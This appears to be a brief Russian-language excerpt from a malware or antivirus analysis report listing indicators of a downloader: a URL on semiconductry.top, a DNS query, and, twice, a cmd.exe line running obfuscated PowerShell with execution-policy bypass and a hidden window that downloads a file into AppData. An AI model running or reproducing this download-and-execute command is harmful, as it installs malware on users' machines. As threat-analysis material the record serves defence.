Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoweRSHEll.eXe -eXecUtioNPoLIcy bYPaSS -nOproFile -WiNDOwstYle HIddEN (neW-object sYSTEm.NEt.webcLient).downlOADfIlE('http://semiconductry.top/search.php','%AppdatA%.Exe');s...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /c "PoweRSHEll.eXe -eXecUtioNPoLIcy bYPaSS -nOproFile -WiNDOwstYle HIddEN (neW-object sYSTEm.NEt.webcLient).downlOADfIlE('http://semiconductry.top/search.php','%AppdatA%.Exe');s...' (со скрытым окном)